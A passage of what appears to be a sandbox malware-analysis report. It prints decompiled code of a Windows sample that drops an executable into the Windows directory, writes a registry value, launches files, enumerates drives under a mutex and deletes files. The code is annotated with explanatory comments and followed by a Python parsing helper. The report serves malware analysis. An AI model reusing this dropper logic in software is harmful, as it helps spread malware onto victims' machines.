                                                                          						_t98 = _v12 - _t111;
                                                                          						if(_t98 < 0) {
                                                                          							L7:
                                                                          							_v20 = _v20 + 1;
                                                                          							_t82 = _t82 + 4;
                                                                          							_t121 = _t121 - 1;
                                                                          							if(_t121 != 0) {
                                                                          								continue;
                                                                          							} else {
                                                                          								goto L8;
                                                                          							}
                                                                          						} else {
                                                                          							_t99 = _t98 + 1;
                                                                          							_t112 = _v8 + _t111 * 4;
                                                                          							while( *((intOrPtr*)( *_t82 + 0x18)) !=  *((intOrPtr*)( *_t112 + 0x18))) {
                                                                          								_t112 = _t112 + 4;
                                                                          								_t99 = _t99 - 1;
                                                                          								if(_t99 != 0) {
                                                                          									continue;
                                                                          								} else {
                                                                          									goto L7;
                                                                          								}
                                                                          								goto L18;
                                                                          							}
                                                                          						}
                                                                          						goto L18;
                                                                          					}
                                                                          				}
                                                                          				L18:
                                                                          				_pop(_t103);
                                                                          				 *[fs:eax] = _t103;
                                                                          				_push(E00406C9E);
                                                                          				_t104 =  *0x406b28; // 0x406b2c
                                                                          				return E00403B30( &_v28, _t104);
                                                                          			}

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteIconInfoObject
                                                                          • String ID: ,k@
                                                                          • API String ID: 2689914137-1053005162
                                                                          • Opcode ID: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                          • Instruction ID: dacdd831d29519e08e7e99a77df17fc26ef5cc856f0b9114ccf97923e4886ce8
                                                                          • Opcode Fuzzy Hash: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                          • Instruction Fuzzy Hash: 9F413AB0E0021A9FDB14DF99C881AAEBBB4FF48314F11407AD942B7391D734AE51CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 72%
                                                                          			E004078A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                          				char* _t39;
                                                                          				void* _t40;
                                                                          				void* _t46;
                                                                          				intOrPtr _t57;
                                                                          				void* _t61;
                                                                          
                                                                          				_t60 = __esi;
                                                                          				_t59 = __edi;
                                                                          				_t46 = __ecx;
                                                                          				_t45 = __ebx;
                                                                          				E004049D0(0, __ebx, _t61 - 0xa244, __edi, __esi);
                                                                          				E00404EEC(_t61 - 0xa240);
                                                                          				SetCurrentDirectoryA(E0040340C( *((intOrPtr*)(_t61 - 0xa240)))); // executed
                                                                          				_push(1);
                                                                          				_push(0);
                                                                          				E00406F34(1, __ebx, _t61 - 0xa248, __edi, __esi);
                                                                          				_push(E0040340C( *((intOrPtr*)(_t61 - 0xa248))));
                                                                          				E00405008(_t61 - 0xa250, _t45, _t46);
                                                                          				E004031F4(_t61 - 0xa254, 9, 0x4091b4);
                                                                          				E004049D0(0, _t45, _t61 - 0xa25c, _t59, _t60);
                                                                          				E00404ED0( *((intOrPtr*)(_t61 - 0xa25c)), _t61 - 0xa258);
                                                                          				E004032CC();
                                                                          				_t39 = E0040340C( *((intOrPtr*)(_t61 - 0xa24c)));
                                                                          				_t40 =  *0x40a650; // 0x400000
                                                                          				ShellExecuteA(_t40, "open", _t39,  *(_t61 - 0xa258),  *(_t61 - 0xa254),  *(_t61 - 0xa250)); // executed
                                                                          				_pop(_t57);
                                                                          				 *[fs:eax] = _t57;
                                                                          				_push(E00407993);
                                                                          				return E004030B8(_t61 - 0xa25c, 0x14);
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004078D0
                                                                            • Part of subcall function 00405008: GetTempPathA.KERNEL32(00000105,?,00000000,00405072,?,00000000), ref: 00405036
                                                                            • Part of subcall function 004049D0: GetCommandLineA.KERNEL32(00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000,?,00408179,00000000,00408220), ref: 00404A23
                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00407969
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                          • String ID: open
                                                                          • API String ID: 2622400689-2758837156
                                                                          • Opcode ID: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                          • Instruction ID: bc53e8da7d6e16968f2b3cdc64b9b09c5d4ffb8ac025ca0eed744acd73de400d
                                                                          • Opcode Fuzzy Hash: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                          • Instruction Fuzzy Hash: 83113070B107198ADB10FB79CC41A8DB779FF85308F0085F6B108BB192D67E9E858E5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 51%
                                                                          			E004079A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				char _v24;
                                                                          				char _v28;
                                                                          				void* _t31;
                                                                          				void* _t59;
                                                                          				intOrPtr _t73;
                                                                          				void* _t82;
                                                                          				void* _t83;
                                                                          				intOrPtr _t86;
                                                                          
                                                                          				_t83 = __esi;
                                                                          				_t82 = __edi;
                                                                          				_t54 = __ebx;
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(__ebx);
                                                                          				_push(_t86);
                                                                          				_push(0x407ac4);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t86;
                                                                          				E00407080(0x4091e0, 0xb, 0xb);
                                                                          				E004031F4( &_v12, 0xb, 0x4091e0);
                                                                          				_push(_v12);
                                                                          				E00404F90( &_v16, __ebx, 0xb);
                                                                          				_pop(_t59);
                                                                          				E00403258( &_v8, _t59, _v16);
                                                                          				if(E00404B9C() != 0) {
                                                                          					DeleteFileA(E0040340C(_v8));
                                                                          				}
                                                                          				_t31 = E00404BF8(E0040340C(_v8), _t54, 0xa200, 0x40a698, _t82, _t83); // executed
                                                                          				if(_t31 != 0) {
                                                                          					E00407080(0x4091ec, 0x1a, 0x1a);
                                                                          					E004031F4( &_v20, 0x1a, 0x4091ec);
                                                                          					_t55 = E0040575C(0x80000000, 0x1a, _v20);
                                                                          					E00407080(0x409208, 8, 8);
                                                                          					E004031F4( &_v28, 8, 0x409208);
                                                                          					E00403258( &_v24, _v28, _v8);
                                                                          					E0040578C(_t40, _v24, 0);
                                                                          					E004057CC(_t55);
                                                                          				}
                                                                          				_pop(_t73);
                                                                          				 *[fs:eax] = _t73;
                                                                          				_push(E00407ACB);
                                                                          				return E004030B8( &_v28, 6);
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 00404F90: GetWindowsDirectoryA.KERNEL32(?,00000105,00000000,00404FFA,?,?,?,00407EB6,00000000,00408020,?,?,00000000,00000000,?,0040819C), ref: 00404FBE
                                                                            • Part of subcall function 00404B9C: GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 00407A0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$AttributesDeleteDirectoryWindows
                                                                          • String ID: MZP
                                                                          • API String ID: 3550186980-2889622443
                                                                          • Opcode ID: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                          • Instruction ID: 69b580403c23d9cc841dfa7c227de2d2e2536c961132663fd28ad6461d03daee
                                                                          • Opcode Fuzzy Hash: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                          • Instruction Fuzzy Hash: 91212F70B04109ABDB04FAA5C85279F7B69EB85304F50847EA501BB3C2DF3CEE05976A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 100%
                                                                          			E00404BC4(void* __eax, long __ecx, void* __edx) {
                                                                          				int _t2;
                                                                          				void* _t3;
                                                                          				DWORD* _t8;
                                                                          
                                                                          				_t2 = ReadFile(__eax, __edx, __ecx, _t8, 0); // executed
                                                                          				_t3 = 0;
                                                                          				if(_t2 == 0) {
                                                                          					return 0;
                                                                          				}
                                                                          				return _t3;
                                                                          			}

                                                                          APIs
                                                                          • ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: MZP
                                                                          • API String ID: 2738559852-2889622443
                                                                          • Opcode ID: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                          • Instruction ID: 3ae4d4c2ce5489376b9a0e409b07906e0c93d400668ceedc4e43a286d92feaa2
                                                                          • Opcode Fuzzy Hash: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                          • Instruction Fuzzy Hash: DEC04CA12582083AF51061A29C16F23355CC781799F12456AB704E51D1F096F81000A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 100%
                                                                          			E00404BE0(void* __eax, long __ecx, void* __edx) {
                                                                          				int _t2;
                                                                          				void* _t3;
                                                                          				void* _t7;
                                                                          				DWORD* _t9;
                                                                          
                                                                          				_t2 = WriteFile(__eax, __edx, __ecx, _t9, 0); // executed
                                                                          				_t3 = _t7;
                                                                          				if(_t2 == 0) {
                                                                          					return 0;
                                                                          				}
                                                                          				return _t3;
                                                                          			}

                                                                          APIs
                                                                          • WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID: MZP
                                                                          • API String ID: 3934441357-2889622443
                                                                          • Opcode ID: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                          • Instruction ID: cd8d274a544879f86d75f83ceab2a9824fbef203ff2d66308718860d554d7d3d
                                                                          • Opcode Fuzzy Hash: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                          • Instruction Fuzzy Hash: 4EC04CA11582083AF51051A7AC06F233A5CC781698F114436BB08E1581F456F8011079
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00401788: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                            • Part of subcall function 00401788: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                            • Part of subcall function 00401788: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                            • Part of subcall function 00401788: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401FF0), ref: 00401EBF
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401FF7), ref: 00401FEA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID:
                                                                          • API String ID: 2227675388-0
                                                                          • Opcode ID: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                          • Instruction ID: c8d1828e50afdd1ef66478082c2fc5af823077db28515af4f228c2db3bc24797
                                                                          • Opcode Fuzzy Hash: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                          • Instruction Fuzzy Hash: 8A419BB2A043029FD714CF69DE81A2AB7B0FB59318B18827FD441E72F1D739A8518A49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 61%
                                                                          			E0040759C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                          				char _v8;                    // string produced by the drive enumeration (E00406D40)
                                                                          				char _v12;                   // per-iteration string handed to E004074B4
                                                                          				void* _t11;
                                                                          				void* _t17;
                                                                          				void* _t32;                  // loop counter, seeded with the length of _v8
                                                                          				intOrPtr _t38;
                                                                          				void* _t44;                  // mutex handle returned by the CreateMutexA wrapper
                                                                          				void* _t46;                  // 1-based iteration index
                                                                          				intOrPtr _t49;
                                                                          				void* _t40;                  // declarations added for temporaries the decompiler used
                                                                          				void* _t45;                  // without declaring; they only carry register state into
                                                                          				void* _t48;                  // the callees and do not change the behaviour shown
                                                                          				void* _t53;
                                                                          				void* _t54;
                                                                          				void* _t56;
                                                                          
                                                                          				_t56 = __fp0;
                                                                          				_t45 = __esi;
                                                                          				_t48 = _t49;
                                                                          				// Delphi-style try/finally prologue: push an SEH frame whose handler is 0x40765c
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(__ebx);
                                                                          				_push(__esi);
                                                                          				_push(__edi);
                                                                          				_push(_t49);
                                                                          				_push(0x40765c);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t49; // executed
                                                                          				_t11 = E00406E94(__ebx, __ecx, __edi, __esi, __eflags, __fp0); // executed
                                                                          				if(_t11 != 0) {
                                                                          					_t40 = 0x14;
                                                                          					// prepare the 0x14-byte buffer at 0x4091c8, then hand it to the CreateMutexA wrapper (see APIs below)
                                                                          					E00407080(0x4091c8, 0x14, 0x14);
                                                                          					_t17 = E00404018(0, 0, 0x4091c8); // executed
                                                                          					_t44 = _t17;
                                                                          					// 0xb7 == ERROR_ALREADY_EXISTS: another instance already owns the mutex, so nothing
                                                                          					// below runs. Note that on that path the handle is neither released nor closed.
                                                                          					if(GetLastError() != 0xb7) {
                                                                          						// E00406D40 calls GetLogicalDriveStringsA and leaves its result string in _v8
                                                                          						E00406D40( &_v8, __ebx, _t44, __esi); // executed
                                                                          						// E0040320C is the string-length routine (E0040578C below passes its result + 1 as cbData)
                                                                          						_t32 = E0040320C(_v8);
                                                                          						_t53 = _t32;
                                                                          						if(_t32 > 0) {
                                                                          							_t46 = 1;
                                                                          							// equivalent of "for _t46 := 1 to Length(_v8)": one pass per character of the drive string
                                                                          							do {
                                                                          								E004031B4();
                                                                          								_t40 = 0x407674;
                                                                          								// load the constant string at 0x407674 into _v12 for this pass
                                                                          								E00403214( &_v12, 0x407674);
                                                                          								E004074B4(_v12, _t32, _t44, _t46, _t53, _t48); // executed
                                                                          								_pop(0x14);
                                                                          								_t46 = _t46 + 1;
                                                                          								_t32 = _t32 - 1;
                                                                          								_t54 = _t32;
                                                                          							} while (_t32 != 0);
                                                                          						}
                                                                          						E00406E0C(_t32, 0x14, _t40, _t44, _t45, _t54, _t56);
                                                                          						ReleaseMutex(_t44);
                                                                          					}
                                                                          				}
                                                                          				// epilogue: unlink the SEH frame, then finalise the two string locals
                                                                          				_pop(_t38);
                                                                          				 *[fs:eax] = _t38;
                                                                          				_push(E00407663);
                                                                          				return E004030B8( &_v12, 2);
                                                                          			}












                                                                          Instruction addresses of the listing above: 0x0040759c - 0x0040765b

                                                                          APIs
                                                                            • Part of subcall function 00404018: CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                          • GetLastError.KERNEL32(00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 004075E5
                                                                            • Part of subcall function 00406D40: GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 0040763C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Mutex$CreateDriveErrorLastLogicalReleaseStrings
                                                                          • String ID:
                                                                          • API String ID: 676290295-0
                                                                          • Opcode ID: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                          • Instruction ID: a50fa674edadcb4b051b0a96f5935ee5b8f91fbc0aee7086ed6abe5ddad9c237
                                                                          • Opcode Fuzzy Hash: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                          • Instruction Fuzzy Hash: A2110A306446086BD710BBA6CC42B5E7B6CCB81714F5004BBFA017B3C3CA3DAD04816E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
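The loop in E0040759C runs once per character of the string that E00406D40 builds from GetLogicalDriveStringsA, so the layout of that API's output matters when reasoning about the iteration count: a run of NUL-terminated root paths ("C:\", "D:\") closed by one extra NUL, the same layout as a REG_MULTI_SZ value. The Python below is an added example and is not code from this report or from the sample. The parse_multi_sz and drive_letters helpers and both sample buffers are constructed here; that the sample collapses the roots to a string of drive letters is my assumption, not something the report states.

```python
# Added example (not from the report or the sample): parse the double-NUL
# terminated ANSI buffer that GetLogicalDriveStringsA fills.
from typing import List


def parse_multi_sz(buf: bytes) -> List[str]:
    """Split a double-NUL-terminated ANSI buffer into its strings.

    Edge case handled: if the caller's buffer was too small the API
    truncates the output and the closing double NUL is missing.  Such a
    buffer is parsed up to the last complete entry; the partial tail is
    dropped rather than returned as a bogus drive root.
    """
    items: List[str] = []
    pos = 0
    while pos < len(buf):
        end = buf.find(b"\x00", pos)
        if end == -1:
            # no terminator left: incomplete entry, ignore it
            break
        if end == pos:
            # an empty string is the list terminator
            break
        items.append(buf[pos:end].decode("latin-1"))
        pos = end + 1
    return items


def drive_letters(buf: bytes) -> str:
    """Collapse root paths to a string of drive letters, e.g. "CDE".

    Assumption (not confirmed by the report): this mirrors the shape of
    the string that a per-character loop such as E0040759C's iterates
    over.  Entries that are not "X:\" roots (volume GUID paths, UNC) are
    skipped instead of producing a letter.
    """
    letters = []
    for root in parse_multi_sz(buf):
        if len(root) >= 2 and root[1] == ":" and root[0].isalpha():
            letters.append(root[0].upper())
    return "".join(letters)


# Constructed sample: what a three-drive host would return.
SAMPLE = b"C:\\\x00D:\\\x00E:\\\x00\x00"
# Constructed sample: the API was handed a buffer that was too small.
TRUNCATED = b"C:\\\x00D:"

if __name__ == "__main__":
    print(parse_multi_sz(SAMPLE))     # ['C:\\', 'D:\\', 'E:\\']
    print(drive_letters(SAMPLE))      # CDE
    print(parse_multi_sz(TRUNCATED))  # ['C:\\']
```

The truncation case is worth keeping in mind when emulating this code path: a sandbox or emulator that returns a short buffer without the closing NUL pair will change the iteration count of the loop above rather than make it fail outright.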

                                                                          C-Code - Quality: 100%
                                                                          			E004012A0(void* __eax, void** __edx) {
                                                                          				void* _t3;
                                                                          				void** _t8;    // out-parameter: [0] = region base, [1] = reserved size
                                                                          				void* _t11;
                                                                          				long _t14;
                                                                          
                                                                          				_t8 = __edx;
                                                                          				// round the request up to the 64 KiB allocation granularity, never below 1 MiB
                                                                          				if(__eax >= 0x100000) {
                                                                          					_t14 = (__eax + 0x0000ffff) & 0xffff0000;
                                                                          				} else {
                                                                          					_t14 = 0x100000;
                                                                          				}
                                                                          				_t8[1] = _t14;
                                                                          				// MEM_RESERVE (0x2000) with PAGE_NOACCESS (1): address space only, committed later by the caller
                                                                          				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                          				_t11 = _t3;
                                                                          				 *_t8 = _t11;
                                                                          				if(_t11 != 0) {
                                                                          					// record the region in the list at 0x40a5d4; if that fails, give the reservation back
                                                                          					_t3 = E00401154(0x40a5d4, _t8);
                                                                          					if(_t3 == 0) {
                                                                          						VirtualFree( *_t8, 0, 0x8000); // MEM_RELEASE
                                                                          						 *_t8 = 0;
                                                                          						return 0;
                                                                          					}
                                                                          				}
                                                                          				return _t3; // 0 when VirtualAlloc failed, otherwise the result of the registration call
                                                                          			}







                                                                          Instruction addresses of the listing above: 0x004012a3 - 0x00401302

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012CF
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                          • Instruction ID: 90e8f67b1060bd1251f945ff82b9078c1ba764c12e4cd0c6011b14969f372c3f
                                                                          • Opcode Fuzzy Hash: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                          • Instruction Fuzzy Hash: 97F02773B006205BEB206A6A4D81B4369C59F59B90F1400BAFB4CFF3D9DA798C0043A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 45%
                                                                          			E00405200(void* __eax, void* __ebx, void* __esi, void* __eflags) {
                                                                          				char _v8;      // list of matching file names, drained by the loop
                                                                          				char _v12;     // name currently being deleted
                                                                          				char _v16;     // intermediate produced by E00404ED0
                                                                          				char _v20;     // value handed to the FindFirstFileA wrapper
                                                                          				void* _t22;
                                                                          				void* _t30;
                                                                          				void* _t31;    // 1 while every delete so far succeeded, 0 after the first failure
                                                                          				void* _t39;
                                                                          				intOrPtr _t41;
                                                                          				intOrPtr _t46;
                                                                          
                                                                          				// Delphi-style try/finally prologue with handler 0x405291
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_t30 = __eax;
                                                                          				_push(_t46);
                                                                          				_push(0x405291);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t46;
                                                                          				E00404ED0(__eax,  &_v16);
                                                                          				_push(_v16);
                                                                          				E00404EEC( &_v20);
                                                                          				_pop(_t39); // executed
                                                                          				// E00405080 wraps FindFirstFileA/FindClose (see APIs below) and fills _v8 with the matches
                                                                          				E00405080(_v20, _t30,  &_v8, _t39, __esi); // executed
                                                                          				_t31 = 1;
                                                                          				while(_v8 != 0) {
                                                                          					// take the next name out of the list into _v12
                                                                          					E00404798( &_v8,  &_v12, E004052A8);
                                                                          					// E0040340C yields a C string pointer for the name. Because of the short-circuit,
                                                                          					// no further DeleteFileA is attempted once one has failed; the list is still drained.
                                                                          					if(_t31 == 0 || DeleteFileA(E0040340C(_v12)) == 0) {
                                                                          						_t22 = 0;
                                                                          					} else {
                                                                          						_t22 = 1;
                                                                          					}
                                                                          					_t31 = _t22;
                                                                          				}
                                                                          				_pop(_t41);
                                                                          				 *[fs:eax] = _t41;
                                                                          				_push(E00405298);
                                                                          				return E004030B8( &_v20, 4); // finalise the four string locals
                                                                          			}













                                                                          Instruction addresses of the listing above: 0x00405205 - 0x00405290

                                                                          APIs
                                                                            • Part of subcall function 00405080: FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                                            • Part of subcall function 00405080: FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00405291,?,?,00000000,00000000,00000000,00000000,?,00407736,?,?,?,00000000,0040798C), ref: 0040525F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFind$CloseDeleteFirst
                                                                          • String ID:
                                                                          • API String ID: 3969940835-0
                                                                          • Opcode ID: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                                          • Instruction ID: 7b79426e1ef5d484ccb35ed710867a40efa654d54104ddfac4c0367765dd07f6
                                                                          • Opcode Fuzzy Hash: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                                          • Instruction Fuzzy Hash: BF01A174604608AFDB04EBA1CC529AF73ACEF45304F5048BEF901B3281E678AE059E68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0040578C(void* __eax, void* __ecx, void* __edx) {
